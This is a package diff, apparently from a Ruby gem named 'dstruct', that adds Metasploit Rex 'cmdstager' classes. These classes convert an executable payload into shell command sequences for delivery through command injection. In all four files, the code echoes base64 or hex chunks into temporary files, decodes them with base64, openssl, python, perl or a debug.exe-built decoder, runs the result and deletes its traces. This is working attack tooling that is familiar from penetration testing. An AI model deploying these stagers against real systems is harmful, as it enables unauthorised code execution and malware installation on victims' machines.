dstruct 0.0.1

data/lib/rex/exploitation/cmdstager.rb

@@ -0,0 +1,10 @@
+# -*- coding: binary -*-
+
+require 'rex/exploitation/cmdstager/base'
+require 'rex/exploitation/cmdstager/vbs'
+require 'rex/exploitation/cmdstager/debug_write'
+require 'rex/exploitation/cmdstager/debug_asm'
+require 'rex/exploitation/cmdstager/tftp'
+require 'rex/exploitation/cmdstager/bourne'
+require 'rex/exploitation/cmdstager/echo'
+require 'rex/exploitation/cmdstager/printf'

data/lib/rex/exploitation/cmdstager/base.rb

@@ -0,0 +1,190 @@
+# -*- coding: binary -*-
+require 'rex/text'
+require 'rex/arch'
+require 'msf/core/framework'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides an interface to generating cmdstagers.
+#
+###
+
+class CmdStagerBase
+
+  def initialize(exe)
+    @linemax     = 2047 # covers most likely cases
+    @exe         = exe
+  end
+
+  #
+  # Generates the cmd payload including the h2bv2 decoder and encoded payload.
+  # The resulting commands also perform cleanup, removing any left over files
+  #
+  def generate(opts = {})
+    # Allow temporary directory override
+    @tempdir = opts[:temp]
+    @tempdir ||= "%TEMP%\\"
+    if (@tempdir == '.')
+      @tempdir = ''
+    end
+
+    opts[:linemax] ||= @linemax
+
+    generate_cmds(opts)
+  end
+
+
+  #
+  # This does the work of actually building an array of commands that
+  # when executed will create and run an executable payload.
+  #
+  def generate_cmds(opts)
+
+    # Initialize an arry of commands to execute
+    cmds = []
+
+    # Add the exe building commands
+    cmds += generate_cmds_payload(opts)
+
+    # Add the decoder script building commands
+    cmds += generate_cmds_decoder(opts)
+
+    compress_commands(cmds, opts)
+  end
+
+
+  #
+  # Generate the commands to create an encoded version of the
+  # payload file
+  #
+  def generate_cmds_payload(opts)
+
+    # First encode the payload
+    encoded = encode_payload(opts)
+
+    # Now split it up into usable pieces
+    parts = slice_up_payload(encoded, opts)
+
+    # Turn each part into a valid command
+    parts_to_commands(parts, opts)
+  end
+
+  #
+  # This method is intended to be override by the child class
+  #
+  def encode_payload(opts)
+    # Defaults to nothing
+    ""
+  end
+
+  #
+  # We take a string of data and turn it into an array of parts.
+  #
+  # We save opts[:extra] bytes out of every opts[:linemax] for the parts
+  # appended and prepended to the resulting elements.
+  #
+  def slice_up_payload(encoded, opts)
+    tmp = encoded.dup
+
+    parts = []
+    xtra_len = opts[:extra]
+    xtra_len ||= 0
+    while (tmp.length > 0)
+      parts << tmp.slice!(0, (opts[:linemax] - xtra_len))
+    end
+
+    parts
+  end
+
+  #
+  # Combine the parts of the encoded file with the stuff that goes
+  # before / after it -- example "echo " and " >>file"
+  #
+  def parts_to_commands(parts, opts)
+    # Return as-is
+    parts
+  end
+
+
+
+  #
+  # Generate the commands that will decode the file we just created
+  #
+  def generate_cmds_decoder(opts)
+    # Defaults to no commands.
+    []
+  end
+
+
+
+  #
+  # Compress commands into as few lines as possible. Minimizes the number of
+  # commands to execute while maximizing the number of commands per execution.
+  #
+  def compress_commands(cmds, opts)
+    new_cmds = []
+    line = ''
+
+    concat = opts[:concat_operator] || cmd_concat_operator
+
+    # We cannot compress commands if there is no way to combine commands on
+    # a single line.
+    return cmds unless concat
+
+    cmds.each { |cmd|
+
+      # If this command will fit, concat it and move on.
+      if ((line.length + cmd.length + concat.length) < opts[:linemax])
+        line << concat if line.length > 0
+        line << cmd
+        next
+      end
+
+      # The command wont fit concat'd to this line, if we have something,
+      # we have to add it to the array now.
+      if (line.length > 0)
+        new_cmds << line
+        line = ''
+      end
+
+      # If it won't fit even after emptying the current line, error out..
+      if (cmd.length > opts[:linemax])
+        raise RuntimeError, 'Line too long - %u bytes, max %u' % [cmd.length, opts[:linemax]]
+      end
+
+      # It will indeed fit by itself, lets add it.
+      line << cmd
+
+    }
+    new_cmds << line if (line.length > 0)
+
+    # Return the final array.
+    new_cmds
+  end
+
+  #
+  # Can be overriden.  For exmaple, use for unix use ";" instead
+  #
+  def cmd_concat_operator
+    nil
+  end
+
+  # Should be overriden if the cmd stager needs to setup anything
+  # before it's executed
+  def setup(mod = nil)
+
+  end
+
+  #
+  # Should be overriden if the cmd stager needs to do any clenaup
+  #
+  def teardown(mod = nil)
+
+  end
+
+end
+end
+end

data/lib/rex/exploitation/cmdstager/bourne.rb

@@ -0,0 +1,105 @@
+# -*- coding: binary -*-
+
+require 'rex/text'
+require 'rex/arch'
+require 'msf/core/framework'
+
+module Rex
+module Exploitation
+
+class CmdStagerBourne < CmdStagerBase
+
+  def initialize(exe)
+    super
+
+    @var_encoded = Rex::Text.rand_text_alpha(5)
+    @var_decoded = Rex::Text.rand_text_alpha(5)
+  end
+
+  def generate(opts = {})
+    opts[:temp] = opts[:temp] || '/tmp/'
+    opts[:temp] = opts[:temp].gsub(/'/, "\\\\'")
+    opts[:temp] = opts[:temp].gsub(/ /, "\\ ")
+    super
+  end
+
+  #
+  # Override just to set the extra byte count
+  #
+  def generate_cmds(opts)
+    # Set the start/end of the commands here (vs initialize) so we have @tempdir
+    @cmd_start = "echo -n "
+    @cmd_end   = ">>#{@tempdir}#{@var_encoded}.b64"
+    xtra_len = @cmd_start.length + @cmd_end.length + 1
+    opts.merge!({ :extra => xtra_len })
+    super
+  end
+
+
+  #
+  # Simple base64...
+  #
+  def encode_payload(opts)
+    Rex::Text.encode_base64(@exe)
+  end
+
+
+  #
+  # Combine the parts of the encoded file with the stuff that goes
+  # before / after it.
+  #
+  def parts_to_commands(parts, opts)
+
+    cmds = []
+    parts.each do |p|
+      cmd = ''
+      cmd << @cmd_start
+      cmd << p
+      cmd << @cmd_end
+      cmds << cmd
+    end
+
+    cmds
+  end
+
+  #
+  # Generate the commands that will decode the file we just created
+  #
+  def generate_cmds_decoder(opts)
+    decoders = [
+      "base64 --decode -",
+      "openssl enc -d -A -base64 -in /dev/stdin",
+      "python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());'",
+      "perl -MMIME::Base64 -ne 'print decode_base64($_)'"
+    ]
+    decoder_cmd = []
+    decoders.each do |cmd|
+      binary = cmd.split(' ')[0]
+      decoder_cmd << "(which #{binary} >&2 && #{cmd})"
+    end
+    decoder_cmd = decoder_cmd.join(" || ")
+    decoder_cmd = "(" << decoder_cmd << ") 2> /dev/null > #{@tempdir}#{@var_decoded}.bin < #{@tempdir}#{@var_encoded}.b64"
+    [ decoder_cmd ]
+  end
+
+  def compress_commands(cmds, opts)
+    # Make it all happen
+    cmds << "chmod +x #{@tempdir}#{@var_decoded}.bin"
+    cmds << "#{@tempdir}#{@var_decoded}.bin"
+
+    # Clean up after unless requested not to..
+    if (not opts[:nodelete])
+      cmds << "rm -f #{@tempdir}#{@var_decoded}.bin"
+      cmds << "rm -f #{@tempdir}#{@var_encoded}.b64"
+    end
+
+    super
+  end
+
+  def cmd_concat_operator
+    " ; "
+  end
+
+end
+end
+end

data/lib/rex/exploitation/cmdstager/debug_asm.rb

@@ -0,0 +1,140 @@
+# -*- coding: binary -*-
+
+require 'rex/text'
+require 'rex/arch'
+require 'msf/core/framework'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides the ability to create a sequence of commands from an executable.
+# When this sequence is ran via command injection or a shell, the resulting exe will
+# be written to disk and executed.
+#
+# This particular version uses debug.exe to assemble a small COM file. The COM will
+# take a hex-ascii file, created via echo >>, and decode it to the final binary.
+#
+# Requires: debug.exe
+#
+# Written by Joshua J. Drake
+#
+###
+
+class CmdStagerDebugAsm < CmdStagerBase
+
+  def initialize(exe)
+    super
+
+    @var_decoder_asm  = Rex::Text.rand_text_alpha(8) + ".dat"
+    @var_decoder_com  = Rex::Text.rand_text_alpha(8) + ".com"
+    @var_payload_in   = Rex::Text.rand_text_alpha(8) + ".dat"
+    @var_payload_out  = Rex::Text.rand_text_alpha(8) + ".exe"
+    @decoder          = nil # filled in later
+  end
+
+
+  #
+  # Override just to set the extra byte count
+  #
+  def generate_cmds(opts)
+    # Set the start/end of the commands here (vs initialize) so we have @tempdir
+    @cmd_start = "echo "
+    @cmd_end   = ">>#{@tempdir}#{@var_payload_in}"
+    xtra_len = @cmd_start.length + @cmd_end.length + 1
+    opts.merge!({ :extra => xtra_len })
+    super
+  end
+
+
+  #
+  # Simple hex encoding...
+  #
+  def encode_payload(opts)
+    ret = @exe.unpack('H*')[0]
+  end
+
+
+  #
+  # Combine the parts of the encoded file with the stuff that goes
+  # before / after it.
+  #
+  def parts_to_commands(parts, opts)
+
+    cmds = []
+    parts.each do |p|
+      cmd = ''
+      cmd << @cmd_start
+      cmd << p
+      cmd << @cmd_end
+      cmds << cmd
+    end
+
+    cmds
+  end
+
+
+  #
+  # Generate the commands that will decode the file we just created
+  #
+  def generate_cmds_decoder(opts)
+
+    # Allow decoder stub override (needs to input base64 and output bin)
+    @decoder = opts[:decoder] if (opts[:decoder])
+
+    # Read the decoder data file
+    f = File.new(@decoder, "rb")
+    decoder = f.read(f.stat.size)
+    f.close
+
+    # Replace variables
+    decoder.gsub!(/decoder_stub/, "#{@tempdir}#{@var_decoder_asm}")
+    decoder.gsub!(/h2b\.com/, "#{@tempdir}#{@var_decoder_com}")
+    # NOTE: these two filenames MUST 8+3 chars long.
+    decoder.gsub!(/testfile\.dat/, "#{@var_payload_in}")
+    decoder.gsub!(/testfile\.out/, "#{@var_payload_out}")
+
+    # Split it apart by the lines
+    decoder.split("\n")
+  end
+
+
+  #
+  # We override compress commands just to stick in a few extra commands
+  # last second..
+  #
+  def compress_commands(cmds, opts)
+    # Convert the debug script to an executable...
+    cvt_cmd = ''
+    if (@tempdir != '')
+      cvt_cmd << "cd %TEMP% && "
+    end
+    cvt_cmd << "debug < #{@tempdir}#{@var_decoder_asm}"
+    cmds << cvt_cmd
+
+    # Convert the encoded payload...
+    cmds << "#{@tempdir}#{@var_decoder_com}"
+
+    # Make it all happen
+    cmds << "start #{@tempdir}#{@var_payload_out}"
+
+    # Clean up after unless requested not to..
+    if (not opts[:nodelete])
+      cmds << "del #{@tempdir}#{@var_decoder_asm}"
+      cmds << "del #{@tempdir}#{@var_decoder_com}"
+      cmds << "del #{@tempdir}#{@var_payload_in}"
+      # XXX: We won't be able to delete the payload while it is running..
+    end
+
+    super
+  end
+
+  # Windows uses & to concat strings
+  def cmd_concat_operator
+    " & "
+  end
+
+end
+end
+end

data/lib/rex/exploitation/cmdstager/debug_write.rb

@@ -0,0 +1,134 @@
+# -*- coding: binary -*-
+
+require 'rex/text'
+require 'rex/arch'
+require 'msf/core/framework'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides the ability to create a sequence of commands from an executable.
+# When this sequence is ran via command injection or a shell, the resulting exe will
+# be written to disk and executed.
+#
+# This particular version uses debug.exe to write a small .NET binary. That binary will
+# take a hex-ascii file, created via echo >>, and decode it to the final binary.
+#
+# Requires: .NET, debug.exe
+#
+###
+
+class CmdStagerDebugWrite < CmdStagerBase
+
+  def initialize(exe)
+    super
+
+    @var_bypass  = Rex::Text.rand_text_alpha(8)
+    @var_payload = Rex::Text.rand_text_alpha(8)
+    @decoder     = nil # filled in later
+  end
+
+
+  #
+  # Override just to set the extra byte count
+  #
+  def generate_cmds(opts)
+    # Set the start/end of the commands here (vs initialize) so we have @tempdir
+    @cmd_start = "echo "
+    @cmd_end   = ">>#{@tempdir}#{@var_payload}"
+    xtra_len = @cmd_start.length + @cmd_end.length + 1
+    opts.merge!({ :extra => xtra_len })
+    super
+  end
+
+
+  #
+  # Simple hex encoding...
+  #
+  def encode_payload(opts)
+    @exe.unpack('H*')[0]
+  end
+
+
+  #
+  # Combine the parts of the encoded file with the stuff that goes
+  # before / after it.
+  #
+  def parts_to_commands(parts, opts)
+
+    cmds = []
+    parts.each do |p|
+      cmd = ''
+      cmd << @cmd_start
+      cmd << p
+      cmd << @cmd_end
+      cmds << cmd
+    end
+
+    cmds
+  end
+
+
+  #
+  # Generate the commands that will decode the file we just created
+  #
+  def generate_cmds_decoder(opts)
+
+    # Allow decoder stub override (needs to input base64 and output bin)
+    @decoder = opts[:decoder] if (opts[:decoder])
+
+    # Read the decoder data file
+    f = File.new(@decoder, "rb")
+    decoder = f.read(f.stat.size)
+    f.close
+
+    # Replace variables
+    decoder.gsub!(/decoder_stub/, "#{@tempdir}#{@var_bypass}")
+
+    # Split it apart by the lines
+    decoder.split("\n")
+  end
+
+
+  #
+  # We override compress commands just to stick in a few extra commands
+  # last second..
+  #
+  def compress_commands(cmds, opts)
+    # Convert the debug script to an executable...
+    cvt_cmd = ''
+    if (@tempdir != '')
+      cvt_cmd << "cd %TEMP% && "
+    end
+    cvt_cmd << "debug < #{@tempdir}#{@var_bypass}"
+    cmds << cvt_cmd
+
+    # Rename the resulting binary
+    cmds << "move #{@tempdir}#{@var_bypass}.bin #{@tempdir}#{@var_bypass}.exe"
+
+    # Converting the encoded payload...
+    cmds << "#{@tempdir}#{@var_bypass}.exe #{@tempdir}#{@var_payload}"
+
+    # Make it all happen
+    cmds << "start #{@tempdir}#{@var_payload}.exe"
+
+    # Clean up after unless requested not to..
+    if (not opts[:nodelete])
+      cmds << "del #{@tempdir}#{@var_bypass}.exe"
+      cmds << "del #{@tempdir}#{@var_payload}"
+      # XXX: We won't be able to delete the payload while it is running..
+    end
+
+    super
+  end
+
+  # Windows uses & to concat strings
+  def cmd_concat_operator
+    " & "
+  end
+
+end
+end
+end